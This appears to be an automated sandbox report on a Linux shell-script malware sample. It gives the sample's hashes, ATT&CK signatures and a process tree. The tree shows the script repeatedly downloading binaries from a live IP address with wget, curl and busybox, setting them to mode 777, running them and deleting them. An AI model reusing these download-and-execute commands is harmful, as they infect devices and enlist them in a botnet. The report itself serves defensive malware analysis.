Analysis
-
max time kernel
87s -
max time network
89s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mips image:debian9-mipsbe-20240611-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mips system -
submitted
25/10/2024, 01:08
Static task
static1
Behavioral task
behavioral1
Sample
ed5983e9e277434326f38c82c7ff7225bb0b45e772d34f74927ccf230df5061f.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
ed5983e9e277434326f38c82c7ff7225bb0b45e772d34f74927ccf230df5061f.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
ed5983e9e277434326f38c82c7ff7225bb0b45e772d34f74927ccf230df5061f.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
ed5983e9e277434326f38c82c7ff7225bb0b45e772d34f74927ccf230df5061f.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
ed5983e9e277434326f38c82c7ff7225bb0b45e772d34f74927ccf230df5061f.sh
-
Size
10KB
-
MD5
28e68f4a8e17f58eb03239953a34f7e6
-
SHA1
ab686c91da287340dad814683646a6b42978b168
-
SHA256
ed5983e9e277434326f38c82c7ff7225bb0b45e772d34f74927ccf230df5061f
-
SHA512
ad6c64228000359844d7cbf7134a85387cef19f1f8d10ee5fb2c649958583cabe83458cc1a0785876804db6f37239ce2a7548eca8ad5c6aca61903a7de19b09f
-
SSDEEP
192:W0H2erUorJWr9dhjRxANRbqck7YcxQE/gYXYMpAAd5MUbYsyck7YcvQE/gYRYMp9:W0H2erUorEr9dkQYMpAAd5MUbYsMYMp9
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
File opened for reading: /proc/sys/crypto/fips_enabled (process: curl)
System Network Configuration Discovery 1 TTPs 20 IoCs
Adversaries may gather information about the network configuration of a system.
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/ed5983e9e277434326f38c82c7ff7225bb0b45e772d34f74927ccf230df5061f.sh/tmp/ed5983e9e277434326f38c82c7ff7225bb0b45e772d34f74927ccf230df5061f.sh1⤵PID:707
-
/bin/rm/bin/rm bins.sh2⤵PID:711
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/eVtr6mKsWhWZHqNDTUIfb56jIpOHbJT8dN2⤵
- System Network Configuration Discovery
PID:714
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/eVtr6mKsWhWZHqNDTUIfb56jIpOHbJT8dN2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:737
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/eVtr6mKsWhWZHqNDTUIfb56jIpOHbJT8dN2⤵
- System Network Configuration Discovery
PID:738
-
-
/bin/chmodchmod 777 eVtr6mKsWhWZHqNDTUIfb56jIpOHbJT8dN2⤵
- File and Directory Permissions Modification
PID:739
-
-
/tmp/eVtr6mKsWhWZHqNDTUIfb56jIpOHbJT8dN./eVtr6mKsWhWZHqNDTUIfb56jIpOHbJT8dN2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:740
-
-
/bin/rmrm eVtr6mKsWhWZHqNDTUIfb56jIpOHbJT8dN2⤵
- System Network Configuration Discovery
PID:741
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/PV8F9E62o6MR4SaqyHPabm8rsZZwUfSBKS2⤵PID:742
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/PV8F9E62o6MR4SaqyHPabm8rsZZwUfSBKS2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:757
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/PV8F9E62o6MR4SaqyHPabm8rsZZwUfSBKS2⤵PID:776
-
-
/bin/chmodchmod 777 PV8F9E62o6MR4SaqyHPabm8rsZZwUfSBKS2⤵
- File and Directory Permissions Modification
PID:783
-
-
/tmp/PV8F9E62o6MR4SaqyHPabm8rsZZwUfSBKS./PV8F9E62o6MR4SaqyHPabm8rsZZwUfSBKS2⤵
- Executes dropped EXE
PID:784
-
-
/bin/rmrm PV8F9E62o6MR4SaqyHPabm8rsZZwUfSBKS2⤵PID:787
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/hHh8KEsNkv2eiUI6TLA5Vu57y7Szx2ihoE2⤵PID:789
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/hHh8KEsNkv2eiUI6TLA5Vu57y7Szx2ihoE2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:794
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/hHh8KEsNkv2eiUI6TLA5Vu57y7Szx2ihoE2⤵PID:795
-
-
/bin/chmodchmod 777 hHh8KEsNkv2eiUI6TLA5Vu57y7Szx2ihoE2⤵
- File and Directory Permissions Modification
PID:796
-
-
/tmp/hHh8KEsNkv2eiUI6TLA5Vu57y7Szx2ihoE./hHh8KEsNkv2eiUI6TLA5Vu57y7Szx2ihoE2⤵
- Executes dropped EXE
PID:797
-
-
/bin/rmrm hHh8KEsNkv2eiUI6TLA5Vu57y7Szx2ihoE2⤵PID:798
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/7A86DeMd4acKUC2E3HSlOl2lkPsS47gbeX2⤵PID:799
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/7A86DeMd4acKUC2E3HSlOl2lkPsS47gbeX2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:800
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/7A86DeMd4acKUC2E3HSlOl2lkPsS47gbeX2⤵PID:803
-
-
/bin/chmodchmod 777 7A86DeMd4acKUC2E3HSlOl2lkPsS47gbeX2⤵
- File and Directory Permissions Modification
PID:808
-
-
/tmp/7A86DeMd4acKUC2E3HSlOl2lkPsS47gbeX./7A86DeMd4acKUC2E3HSlOl2lkPsS47gbeX2⤵
- Executes dropped EXE
PID:810
-
-
/bin/rmrm 7A86DeMd4acKUC2E3HSlOl2lkPsS47gbeX2⤵PID:813
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/MUjlvGgt0notVYjDV6ojxgyrJKDJYWUxSk2⤵PID:815
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/MUjlvGgt0notVYjDV6ojxgyrJKDJYWUxSk2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:828
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/MUjlvGgt0notVYjDV6ojxgyrJKDJYWUxSk2⤵PID:837
-
-
/bin/chmodchmod 777 MUjlvGgt0notVYjDV6ojxgyrJKDJYWUxSk2⤵
- File and Directory Permissions Modification
PID:838
-
-
/tmp/MUjlvGgt0notVYjDV6ojxgyrJKDJYWUxSk./MUjlvGgt0notVYjDV6ojxgyrJKDJYWUxSk2⤵
- Executes dropped EXE
PID:839
-
-
/bin/rmrm MUjlvGgt0notVYjDV6ojxgyrJKDJYWUxSk2⤵PID:840
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/g8jQpnSjblf2nc9T1hTeufDqabQ7fNV62p2⤵PID:841
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/g8jQpnSjblf2nc9T1hTeufDqabQ7fNV62p2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:842
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/g8jQpnSjblf2nc9T1hTeufDqabQ7fNV62p2⤵PID:843
-
-
/bin/chmodchmod 777 g8jQpnSjblf2nc9T1hTeufDqabQ7fNV62p2⤵
- File and Directory Permissions Modification
PID:844
-
-
/tmp/g8jQpnSjblf2nc9T1hTeufDqabQ7fNV62p./g8jQpnSjblf2nc9T1hTeufDqabQ7fNV62p2⤵
- Executes dropped EXE
PID:845
-
-
/bin/rmrm g8jQpnSjblf2nc9T1hTeufDqabQ7fNV62p2⤵PID:846
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/qVCNSv8UqLWBngnz9l4t30JMgGY2Rq3jD12⤵PID:847
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/qVCNSv8UqLWBngnz9l4t30JMgGY2Rq3jD12⤵
- Reads runtime system information
- Writes file to tmp directory
PID:851
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/qVCNSv8UqLWBngnz9l4t30JMgGY2Rq3jD12⤵PID:852
-
-
/bin/chmodchmod 777 qVCNSv8UqLWBngnz9l4t30JMgGY2Rq3jD12⤵
- File and Directory Permissions Modification
PID:853
-
-
/tmp/qVCNSv8UqLWBngnz9l4t30JMgGY2Rq3jD1./qVCNSv8UqLWBngnz9l4t30JMgGY2Rq3jD12⤵
- Executes dropped EXE
PID:854
-
-
/bin/rmrm qVCNSv8UqLWBngnz9l4t30JMgGY2Rq3jD12⤵PID:855
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/tX9G9aOCzZY4cqoQDtolTXKngySt0UTRKd2⤵PID:856
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/tX9G9aOCzZY4cqoQDtolTXKngySt0UTRKd2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:857
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/tX9G9aOCzZY4cqoQDtolTXKngySt0UTRKd2⤵PID:858
-
-
/bin/chmodchmod 777 tX9G9aOCzZY4cqoQDtolTXKngySt0UTRKd2⤵
- File and Directory Permissions Modification
PID:859
-
-
/tmp/tX9G9aOCzZY4cqoQDtolTXKngySt0UTRKd./tX9G9aOCzZY4cqoQDtolTXKngySt0UTRKd2⤵
- Executes dropped EXE
PID:860
-
-
/bin/rmrm tX9G9aOCzZY4cqoQDtolTXKngySt0UTRKd2⤵PID:861
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/mqqXDH3HRvjR93ZHYP4sJUcKXHneUl4EWk2⤵PID:862
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/mqqXDH3HRvjR93ZHYP4sJUcKXHneUl4EWk2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:863
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/mqqXDH3HRvjR93ZHYP4sJUcKXHneUl4EWk2⤵PID:864
-
-
/bin/chmodchmod 777 mqqXDH3HRvjR93ZHYP4sJUcKXHneUl4EWk2⤵
- File and Directory Permissions Modification
PID:865
-
-
/tmp/mqqXDH3HRvjR93ZHYP4sJUcKXHneUl4EWk./mqqXDH3HRvjR93ZHYP4sJUcKXHneUl4EWk2⤵
- Executes dropped EXE
PID:866
-
-
/bin/rmrm mqqXDH3HRvjR93ZHYP4sJUcKXHneUl4EWk2⤵PID:867
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/tWWQiePOzf8RWcFnZrd9LCHYyIdOFFNRLc2⤵PID:868
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/tWWQiePOzf8RWcFnZrd9LCHYyIdOFFNRLc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:869
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/tWWQiePOzf8RWcFnZrd9LCHYyIdOFFNRLc2⤵PID:870
-
-
/bin/chmodchmod 777 tWWQiePOzf8RWcFnZrd9LCHYyIdOFFNRLc2⤵
- File and Directory Permissions Modification
PID:871
-
-
/tmp/tWWQiePOzf8RWcFnZrd9LCHYyIdOFFNRLc./tWWQiePOzf8RWcFnZrd9LCHYyIdOFFNRLc2⤵
- Executes dropped EXE
PID:872
-
-
/bin/rmrm tWWQiePOzf8RWcFnZrd9LCHYyIdOFFNRLc2⤵PID:873
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/fWgYrQPdDTedb2f11EKrUil3qMVvf1zIPG2⤵
- System Network Configuration Discovery
PID:874
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/fWgYrQPdDTedb2f11EKrUil3qMVvf1zIPG2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:875
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/fWgYrQPdDTedb2f11EKrUil3qMVvf1zIPG2⤵
- System Network Configuration Discovery
PID:876
-
-
/bin/chmodchmod 777 fWgYrQPdDTedb2f11EKrUil3qMVvf1zIPG2⤵
- File and Directory Permissions Modification
PID:877
-
-
/tmp/fWgYrQPdDTedb2f11EKrUil3qMVvf1zIPG./fWgYrQPdDTedb2f11EKrUil3qMVvf1zIPG2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:878
-
-
/bin/rmrm fWgYrQPdDTedb2f11EKrUil3qMVvf1zIPG2⤵
- System Network Configuration Discovery
PID:879
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Oi8Cu9hsBxcn4q645dRIgo3fwlEdpcDYYe2⤵PID:880
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Oi8Cu9hsBxcn4q645dRIgo3fwlEdpcDYYe2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:881
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Oi8Cu9hsBxcn4q645dRIgo3fwlEdpcDYYe2⤵PID:882
-
-
/bin/chmodchmod 777 Oi8Cu9hsBxcn4q645dRIgo3fwlEdpcDYYe2⤵
- File and Directory Permissions Modification
PID:883
-
-
/tmp/Oi8Cu9hsBxcn4q645dRIgo3fwlEdpcDYYe./Oi8Cu9hsBxcn4q645dRIgo3fwlEdpcDYYe2⤵
- Executes dropped EXE
PID:884
-
-
/bin/rmrm Oi8Cu9hsBxcn4q645dRIgo3fwlEdpcDYYe2⤵PID:885
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/DJ6Q1y1n31SzGG4gOAQeNexOMIIwZJtNe82⤵PID:886
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/DJ6Q1y1n31SzGG4gOAQeNexOMIIwZJtNe82⤵
- Reads runtime system information
- Writes file to tmp directory
PID:887
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/DJ6Q1y1n31SzGG4gOAQeNexOMIIwZJtNe82⤵PID:888
-
-
/bin/chmodchmod 777 DJ6Q1y1n31SzGG4gOAQeNexOMIIwZJtNe82⤵
- File and Directory Permissions Modification
PID:889
-
-
/tmp/DJ6Q1y1n31SzGG4gOAQeNexOMIIwZJtNe8./DJ6Q1y1n31SzGG4gOAQeNexOMIIwZJtNe82⤵
- Executes dropped EXE
PID:890
-
-
/bin/rmrm DJ6Q1y1n31SzGG4gOAQeNexOMIIwZJtNe82⤵PID:891
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/eObpyNsrpZ5L9DkveyNOKyKZneIY0DdQjP2⤵PID:892
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/eObpyNsrpZ5L9DkveyNOKyKZneIY0DdQjP2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:893
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/eObpyNsrpZ5L9DkveyNOKyKZneIY0DdQjP2⤵PID:894
-
-
/bin/chmodchmod 777 eObpyNsrpZ5L9DkveyNOKyKZneIY0DdQjP2⤵
- File and Directory Permissions Modification
PID:895
-
-
/tmp/eObpyNsrpZ5L9DkveyNOKyKZneIY0DdQjP./eObpyNsrpZ5L9DkveyNOKyKZneIY0DdQjP2⤵
- Executes dropped EXE
PID:896
-
-
/bin/rmrm eObpyNsrpZ5L9DkveyNOKyKZneIY0DdQjP2⤵PID:897
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/mqqXDH3HRvjR93ZHYP4sJUcKXHneUl4EWk2⤵PID:898
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/mqqXDH3HRvjR93ZHYP4sJUcKXHneUl4EWk2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:899
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/mqqXDH3HRvjR93ZHYP4sJUcKXHneUl4EWk2⤵PID:900
-
-
/bin/chmodchmod 777 mqqXDH3HRvjR93ZHYP4sJUcKXHneUl4EWk2⤵
- File and Directory Permissions Modification
PID:901
-
-
/tmp/mqqXDH3HRvjR93ZHYP4sJUcKXHneUl4EWk./mqqXDH3HRvjR93ZHYP4sJUcKXHneUl4EWk2⤵
- Executes dropped EXE
PID:902
-
-
/bin/rmrm mqqXDH3HRvjR93ZHYP4sJUcKXHneUl4EWk2⤵PID:903
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/tWWQiePOzf8RWcFnZrd9LCHYyIdOFFNRLc2⤵PID:904
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/tWWQiePOzf8RWcFnZrd9LCHYyIdOFFNRLc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:905
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/tWWQiePOzf8RWcFnZrd9LCHYyIdOFFNRLc2⤵PID:906
-
-
/bin/chmodchmod 777 tWWQiePOzf8RWcFnZrd9LCHYyIdOFFNRLc2⤵
- File and Directory Permissions Modification
PID:907
-
-
/tmp/tWWQiePOzf8RWcFnZrd9LCHYyIdOFFNRLc./tWWQiePOzf8RWcFnZrd9LCHYyIdOFFNRLc2⤵
- Executes dropped EXE
PID:908
-
-
/bin/rmrm tWWQiePOzf8RWcFnZrd9LCHYyIdOFFNRLc2⤵PID:909
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/fWgYrQPdDTedb2f11EKrUil3qMVvf1zIPG2⤵
- System Network Configuration Discovery
PID:910
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/fWgYrQPdDTedb2f11EKrUil3qMVvf1zIPG2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:911
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/fWgYrQPdDTedb2f11EKrUil3qMVvf1zIPG2⤵
- System Network Configuration Discovery
PID:912
-
-
/bin/chmodchmod 777 fWgYrQPdDTedb2f11EKrUil3qMVvf1zIPG2⤵
- File and Directory Permissions Modification
PID:913
-
-
/tmp/fWgYrQPdDTedb2f11EKrUil3qMVvf1zIPG./fWgYrQPdDTedb2f11EKrUil3qMVvf1zIPG2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:914
-
-
/bin/rmrm fWgYrQPdDTedb2f11EKrUil3qMVvf1zIPG2⤵
- System Network Configuration Discovery
PID:915
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Oi8Cu9hsBxcn4q645dRIgo3fwlEdpcDYYe2⤵PID:916
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Oi8Cu9hsBxcn4q645dRIgo3fwlEdpcDYYe2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:917
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Oi8Cu9hsBxcn4q645dRIgo3fwlEdpcDYYe2⤵PID:918
-
-
/bin/chmodchmod 777 Oi8Cu9hsBxcn4q645dRIgo3fwlEdpcDYYe2⤵
- File and Directory Permissions Modification
PID:919
-
-
/tmp/Oi8Cu9hsBxcn4q645dRIgo3fwlEdpcDYYe./Oi8Cu9hsBxcn4q645dRIgo3fwlEdpcDYYe2⤵
- Executes dropped EXE
PID:920
-
-
/bin/rmrm Oi8Cu9hsBxcn4q645dRIgo3fwlEdpcDYYe2⤵PID:921
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/DJ6Q1y1n31SzGG4gOAQeNexOMIIwZJtNe82⤵PID:922
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/DJ6Q1y1n31SzGG4gOAQeNexOMIIwZJtNe82⤵
- Reads runtime system information
- Writes file to tmp directory
PID:923
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/DJ6Q1y1n31SzGG4gOAQeNexOMIIwZJtNe82⤵PID:924
-
-
/bin/chmodchmod 777 DJ6Q1y1n31SzGG4gOAQeNexOMIIwZJtNe82⤵
- File and Directory Permissions Modification
PID:925
-
-
/tmp/DJ6Q1y1n31SzGG4gOAQeNexOMIIwZJtNe8./DJ6Q1y1n31SzGG4gOAQeNexOMIIwZJtNe82⤵
- Executes dropped EXE
PID:926
-
-
/bin/rmrm DJ6Q1y1n31SzGG4gOAQeNexOMIIwZJtNe82⤵PID:927
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/eObpyNsrpZ5L9DkveyNOKyKZneIY0DdQjP2⤵PID:928
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/eObpyNsrpZ5L9DkveyNOKyKZneIY0DdQjP2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:929
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/eObpyNsrpZ5L9DkveyNOKyKZneIY0DdQjP2⤵PID:930
-
-
/bin/chmodchmod 777 eObpyNsrpZ5L9DkveyNOKyKZneIY0DdQjP2⤵
- File and Directory Permissions Modification
PID:931
-
-
/tmp/eObpyNsrpZ5L9DkveyNOKyKZneIY0DdQjP./eObpyNsrpZ5L9DkveyNOKyKZneIY0DdQjP2⤵
- Executes dropped EXE
PID:932
-
-
/bin/rmrm eObpyNsrpZ5L9DkveyNOKyKZneIY0DdQjP2⤵PID:933
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/PV8F9E62o6MR4SaqyHPabm8rsZZwUfSBKS2⤵PID:934
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/PV8F9E62o6MR4SaqyHPabm8rsZZwUfSBKS2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:935
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/PV8F9E62o6MR4SaqyHPabm8rsZZwUfSBKS2⤵PID:936
-
-
/bin/chmodchmod 777 PV8F9E62o6MR4SaqyHPabm8rsZZwUfSBKS2⤵
- File and Directory Permissions Modification
PID:937
-
-
/tmp/PV8F9E62o6MR4SaqyHPabm8rsZZwUfSBKS./PV8F9E62o6MR4SaqyHPabm8rsZZwUfSBKS2⤵
- Executes dropped EXE
PID:938
-
-
/bin/rmrm PV8F9E62o6MR4SaqyHPabm8rsZZwUfSBKS2⤵PID:939
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/hHh8KEsNkv2eiUI6TLA5Vu57y7Szx2ihoE2⤵PID:940
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/hHh8KEsNkv2eiUI6TLA5Vu57y7Szx2ihoE2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:941
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/hHh8KEsNkv2eiUI6TLA5Vu57y7Szx2ihoE2⤵PID:942
-
-
/bin/chmodchmod 777 hHh8KEsNkv2eiUI6TLA5Vu57y7Szx2ihoE2⤵
- File and Directory Permissions Modification
PID:943
-
-
/tmp/hHh8KEsNkv2eiUI6TLA5Vu57y7Szx2ihoE./hHh8KEsNkv2eiUI6TLA5Vu57y7Szx2ihoE2⤵
- Executes dropped EXE
PID:944
-
-
/bin/rmrm hHh8KEsNkv2eiUI6TLA5Vu57y7Szx2ihoE2⤵PID:945
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/7A86DeMd4acKUC2E3HSlOl2lkPsS47gbeX2⤵PID:946
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/7A86DeMd4acKUC2E3HSlOl2lkPsS47gbeX2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:947
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/7A86DeMd4acKUC2E3HSlOl2lkPsS47gbeX2⤵PID:948
-
-
/bin/chmodchmod 777 7A86DeMd4acKUC2E3HSlOl2lkPsS47gbeX2⤵
- File and Directory Permissions Modification
PID:949
-
-
/tmp/7A86DeMd4acKUC2E3HSlOl2lkPsS47gbeX./7A86DeMd4acKUC2E3HSlOl2lkPsS47gbeX2⤵
- Executes dropped EXE
PID:950
-
-
/bin/rmrm 7A86DeMd4acKUC2E3HSlOl2lkPsS47gbeX2⤵PID:951
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/MUjlvGgt0notVYjDV6ojxgyrJKDJYWUxSk2⤵PID:952
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/MUjlvGgt0notVYjDV6ojxgyrJKDJYWUxSk2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:953
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/MUjlvGgt0notVYjDV6ojxgyrJKDJYWUxSk2⤵PID:954
-
-
/bin/chmodchmod 777 MUjlvGgt0notVYjDV6ojxgyrJKDJYWUxSk2⤵
- File and Directory Permissions Modification
PID:955
-
-
/tmp/MUjlvGgt0notVYjDV6ojxgyrJKDJYWUxSk./MUjlvGgt0notVYjDV6ojxgyrJKDJYWUxSk2⤵
- Executes dropped EXE
PID:956
-
-
/bin/rmrm MUjlvGgt0notVYjDV6ojxgyrJKDJYWUxSk2⤵PID:957
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/eVtr6mKsWhWZHqNDTUIfb56jIpOHbJT8dN2⤵
- System Network Configuration Discovery
PID:958
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/eVtr6mKsWhWZHqNDTUIfb56jIpOHbJT8dN2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:959
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/eVtr6mKsWhWZHqNDTUIfb56jIpOHbJT8dN2⤵
- System Network Configuration Discovery
PID:960
-
-
/bin/chmodchmod 777 eVtr6mKsWhWZHqNDTUIfb56jIpOHbJT8dN2⤵
- File and Directory Permissions Modification
PID:961
-
-
/tmp/eVtr6mKsWhWZHqNDTUIfb56jIpOHbJT8dN./eVtr6mKsWhWZHqNDTUIfb56jIpOHbJT8dN2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:962
-
-
/bin/rmrm eVtr6mKsWhWZHqNDTUIfb56jIpOHbJT8dN2⤵
- System Network Configuration Discovery
PID:963
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/g8jQpnSjblf2nc9T1hTeufDqabQ7fNV62p2⤵PID:964
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/g8jQpnSjblf2nc9T1hTeufDqabQ7fNV62p2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:965
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/g8jQpnSjblf2nc9T1hTeufDqabQ7fNV62p2⤵PID:966
-
-
/bin/chmodchmod 777 g8jQpnSjblf2nc9T1hTeufDqabQ7fNV62p2⤵
- File and Directory Permissions Modification
PID:967
-
-
/tmp/g8jQpnSjblf2nc9T1hTeufDqabQ7fNV62p./g8jQpnSjblf2nc9T1hTeufDqabQ7fNV62p2⤵
- Executes dropped EXE
PID:968
-
-
/bin/rmrm g8jQpnSjblf2nc9T1hTeufDqabQ7fNV62p2⤵PID:969
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/qVCNSv8UqLWBngnz9l4t30JMgGY2Rq3jD12⤵PID:970
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/qVCNSv8UqLWBngnz9l4t30JMgGY2Rq3jD12⤵
- Reads runtime system information
- Writes file to tmp directory
PID:971
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/qVCNSv8UqLWBngnz9l4t30JMgGY2Rq3jD12⤵PID:972
-
-
/bin/chmodchmod 777 qVCNSv8UqLWBngnz9l4t30JMgGY2Rq3jD12⤵
- File and Directory Permissions Modification
PID:973
-
-
/tmp/qVCNSv8UqLWBngnz9l4t30JMgGY2Rq3jD1./qVCNSv8UqLWBngnz9l4t30JMgGY2Rq3jD12⤵
- Executes dropped EXE
PID:974
-
-
/bin/rmrm qVCNSv8UqLWBngnz9l4t30JMgGY2Rq3jD12⤵PID:975
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/tX9G9aOCzZY4cqoQDtolTXKngySt0UTRKd2⤵PID:976
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/tX9G9aOCzZY4cqoQDtolTXKngySt0UTRKd2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:977
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/tX9G9aOCzZY4cqoQDtolTXKngySt0UTRKd2⤵PID:978
-
-
/bin/chmodchmod 777 tX9G9aOCzZY4cqoQDtolTXKngySt0UTRKd2⤵
- File and Directory Permissions Modification
PID:979
-
-
/tmp/tX9G9aOCzZY4cqoQDtolTXKngySt0UTRKd./tX9G9aOCzZY4cqoQDtolTXKngySt0UTRKd2⤵
- Executes dropped EXE
PID:980
-
-
/bin/rmrm tX9G9aOCzZY4cqoQDtolTXKngySt0UTRKd2⤵PID:981
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5
998368d7c95ea4293237f2320546e440
SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97